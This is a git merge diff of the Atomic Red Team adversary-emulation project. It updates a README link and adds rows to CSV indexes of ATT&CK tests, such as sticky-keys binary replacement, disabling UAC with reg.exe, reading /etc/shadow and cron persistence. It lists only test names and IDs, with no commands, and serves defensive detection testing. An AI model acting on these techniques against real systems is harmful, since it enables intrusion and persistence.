Merge branch 'master' into bugfix/7e46c7a5-0142-45be-a858-1a3ecb4fd3cb

2020-12-01 12:10:18 -05:00
parent becfc6e128 90cc72063a
commit 0e6ceefc7e
40 changed files with 1484 additions and 152 deletions
@@ -39,7 +39,7 @@ Join the community on Slack at [https://atomicredteam.slack.com](https://atomicr
 ## Getting Started

 * [Getting Started With Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/wiki/About-Atomic-Red-Team)
-* Automated Test Execution with the [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/blob/master/execution-frameworks)
+* Automated Test Execution with the [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/wiki/Executing-Atomic-Tests#execute-an-atomic-test-with-an-execution-framework)
 * Peruse the Complete list of Atomic Tests ([md](atomics/Indexes/Indexes-Markdown/index.md), [csv](atomics/Indexes/Indexes-CSV/index.csv)) and the [ATT&CK Matrix](atomics/Indexes/Matrices/matrix.md)
  - Windows [Matrix](atomics/Indexes/Matrices/windows-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/windows-index.md), [csv](atomics/Indexes/Indexes-CSV/windows-index.csv))
  - MacOS [Matrix](atomics/Indexes/Matrices/macos-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/macos-index.md), [csv](atomics/Indexes/Indexes-CSV/macos-index.csv))
@@ -2,6 +2,7 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
 privilege-escalation,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
 privilege-escalation,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
 privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
+privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
 privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
 privilege-escalation,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
 privilege-escalation,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
@@ -16,12 +17,14 @@ privilege-escalation,T1548.002,Bypass User Access Control,4,Bypass UAC using Fod
 privilege-escalation,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
 privilege-escalation,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
 privilege-escalation,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
+privilege-escalation,T1548.002,Bypass User Access Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
 privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
 privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
-privilege-escalation,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
+privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
+privilege-escalation,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
 privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
@@ -63,6 +66,7 @@ privilege-escalation,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task
 privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
 privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
 privilege-escalation,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
+privilege-escalation,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
 privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
 privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
@@ -86,6 +90,7 @@ privilege-escalation,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon P
 persistence,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
 persistence,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
 persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
+persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
 persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
 persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
@@ -107,13 +112,15 @@ persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce
 persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
 persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
-persistence,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
+persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
+persistence,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
 persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
 persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
 persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
 persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
+persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
 persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
 persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
 persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
@@ -152,6 +159,7 @@ persistence,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f
 persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
 persistence,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
 persistence,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
+persistence,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 persistence,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
 persistence,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
 persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
@@ -166,6 +174,8 @@ persistence,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6
 persistence,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
 persistence,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
 persistence,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
+credential-access,T1003.008,/etc/passwd and /etc/shadow,1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
+credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh
 credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
 credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
 credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
@@ -230,6 +240,7 @@ defense-evasion,T1548.002,Bypass User Access Control,4,Bypass UAC using Fodhelpe
 defense-evasion,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
 defense-evasion,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
 defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
+defense-evasion,T1548.002,Bypass User Access Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
 defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
 defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
 defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -423,6 +434,7 @@ defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-c
 defense-evasion,T1218.011,Rundll32,5,Rundll32 syssetup.dll Execution,41fa324a-3946-401e-bbdd-d7991c628125,command_prompt
 defense-evasion,T1218.011,Rundll32,6,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt
 defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
+defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 defense-evasion,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
 defense-evasion,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
 defense-evasion,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
@@ -457,7 +469,8 @@ defense-evasion,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token d
 defense-evasion,T1222.001,Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt
 defense-evasion,T1222.001,Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt
 defense-evasion,T1222.001,Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
-defense-evasion,T1222.001,Windows File and Directory Permissions Modification,4,Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,powershell
+defense-evasion,T1222.001,Windows File and Directory Permissions Modification,4,attrib - hide file,32b979da-7b68-42c9-9a99-0e39900fc36c,command_prompt
+defense-evasion,T1222.001,Windows File and Directory Permissions Modification,5,Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,powershell
 defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt
 defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt
 defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt
@@ -592,6 +605,7 @@ discovery,T1016,System Network Configuration Discovery,3,System Network Configur
 discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (TrickBot Style),dafaf052-5508-402d-bf77-51e0700c02e2,command_prompt
 discovery,T1016,System Network Configuration Discovery,5,List Open Egress Ports,4b467538-f102-491d-ace7-ed487b853bf5,powershell
 discovery,T1016,System Network Configuration Discovery,6,Adfind - Enumerate Active Directory Subnet Objects,9bb45dd7-c466-4f93-83a1-be30e56033ee,command_prompt
+discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5818-4868-b8a7-8fd07c455c1b,command_prompt
 discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
 discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
 discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
@@ -606,7 +620,8 @@ execution,T1059.002,AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2
 execution,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 execution,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
-execution,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
+execution,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
+execution,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
 execution,T1559.002,Dynamic Data Exchange,1,Execute Commands,f592ba2a-e9e8-4d62-a459-ef63abd819fd,manual
 execution,T1559.002,Dynamic Data Exchange,2,Execute PowerShell script via Word DDE,47c21fb6-085e-4b0d-b4d2-26d72c3830b3,command_prompt
 execution,T1559.002,Dynamic Data Exchange,3,DDEAUTO,cf91174c-4e74-414e-bec0-8d60a104d181,manual
@@ -736,5 +751,6 @@ exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
 initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
+initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
 initial-access,T1566.001,Spearphishing Attachment,1,Download Phishing Attachment - VBScript,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
 initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
@@ -3,7 +3,8 @@ privilege-escalation,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_
 privilege-escalation,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
 privilege-escalation,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
-privilege-escalation,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
+privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
+privilege-escalation,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
 privilege-escalation,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
 privilege-escalation,T1574.006,LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 privilege-escalation,T1574.006,LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
@@ -22,7 +23,8 @@ persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4ab
 persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
 persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
-persistence,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
+persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
+persistence,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
 persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
 persistence,T1574.006,LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 persistence,T1574.006,LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
@@ -31,6 +33,8 @@ persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID
 persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
 persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
 persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
+credential-access,T1003.008,/etc/passwd and /etc/shadow,1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
+credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh
 credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
 credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
 credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
@@ -149,7 +153,8 @@ collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe
 collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
 execution,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
-execution,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
+execution,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
+execution,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
 execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
 execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
 exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
@@ -2,7 +2,7 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
 privilege-escalation,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
 privilege-escalation,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
 privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
-privilege-escalation,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
+privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
 privilege-escalation,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
 privilege-escalation,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
 privilege-escalation,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
@@ -27,7 +27,7 @@ persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4
 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
 persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
 persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
-persistence,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
+persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
 persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
 persistence,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
 persistence,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
@@ -127,7 +127,7 @@ discovery,T1049,System Network Connections Discovery,3,System Network Connection
 discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
 execution,T1059.002,AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh
 execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
-execution,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
+execution,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
 execution,T1569.001,Launchctl,1,Launchctl,6fb61988-724e-4755-a595-07743749d4e2,bash
 execution,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
 execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
@@ -1,5 +1,6 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
 privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
+privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
 privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
 privilege-escalation,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
 privilege-escalation,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
@@ -13,6 +14,7 @@ privilege-escalation,T1548.002,Bypass User Access Control,4,Bypass UAC using Fod
 privilege-escalation,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
 privilege-escalation,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
 privilege-escalation,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
+privilege-escalation,T1548.002,Bypass User Access Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
 privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -46,6 +48,7 @@ privilege-escalation,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task
 privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
 privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
 privilege-escalation,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
